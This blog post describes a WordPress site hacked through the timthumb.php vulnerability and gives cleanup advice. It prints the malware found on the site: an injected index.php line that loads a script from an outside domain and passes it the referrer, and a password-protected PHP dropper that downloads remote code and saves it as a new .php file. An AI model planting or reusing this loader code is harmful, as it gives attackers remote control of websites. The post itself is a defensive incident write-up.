WordPress Sites Using Timthumb.php is Prone to Hacking | How to Secure your WordPress Blog | Security Issue In WordPress Blog |

Hey Friends.. Today i am Telling About The WordPress Hacking And How Can You Prevent Your WordPress Blog From Hackers. You All know That WordPress Hacking Is Very Easy If you don’t follow all security steps. Today one of my Client pinged me and told me that he is unable to login to his Wp-admin. His wp-admin was giving some error as shown below :-

 

When I logged into client site via FTP, I see some of the files were modified and some weird php files were added. The first weird code was found in index.php at the root of WordPress installation. Which has code:-

 

echo’<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=’.urlencode($_SERVER[‘HTTP_REFERER’]) .’"></script>’; ?>

Then in plugin folder there was a file call upd.php which has following codes :- 

$file $_GET['file'];   <br />$pass $_GET['pass'];    <br />$true '1c383cd30b7c298ab50293adfecb7b18';    <br />if ($pass == $true){ </p>  <p>$ch = curl_init($file);   <br />curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);    <br />curl_setopt($ch, CURLOPT_HEADER, 0);    <br />curl_setopt($ch, CURLOPT_TIMEOUT, 5);    <br />$shell = curl_exec($ch);    <br />curl_close($ch); </p>  <p>$tmp = md5(rand(0,10000)); </p>  <p>$f fopen($tmp.'.php',&quot;w&quot;);   <br />fputs($f,$shell);    <br />fclose($f);</p>  <p>

Well that’s not all, there are many such other files which were infected. The reason for this hacking is Remote injection due to one vulnerability in timthumb.php.

 

What is Timthumb.php?

Timthumb.php is one of the most popular script to auto-generate thumbnail and it’s being used by almost all the popular premium WordPress theme club, many sites are getting infected due to this hack. The vulnerability in timthumb.php script allows hacker to upload an arbitrary php code in the cache directory of timthumb script and execute it. Once hacker execute this php file, he gets almost all the control of your site and he can do anything. In most of the cases you will see, your site is getting redirected or some ads and popup will appear on your site. In my client case, it’s wp-admin is inaccessible.

 

So what’s the solution to this timthumb.php Hack?

Very first thing which you should do is scan your Blog or you can ask your hosting company to run a scan. Delete all unused themes and plugins. Update all plugins and themes to latest version. If you using a free and outdated theme, you should switch to any premium WordPress theme or any free theme which keep getting constant updates. My recommendation grab Thesis theme which is well supported by the community and constantly updated. You can manually reinstall WordPress, update your theme and most imp. update the timthumb.php file. Author of this script has already updated the new file, which you can grab from here. Once done, recheck all files and check if there is any trace of hacked code. You can use some security WordPress plugin to see if any traces of hacked file is left or not.

Even if you are not hacked or using an old version of Theme, I would suggest you to update your theme to latest version or atleast update your timthumb.php. Always remember, prevention is better than cure.

 

Leave a Reply

Your email address will not be published. Required fields are marked *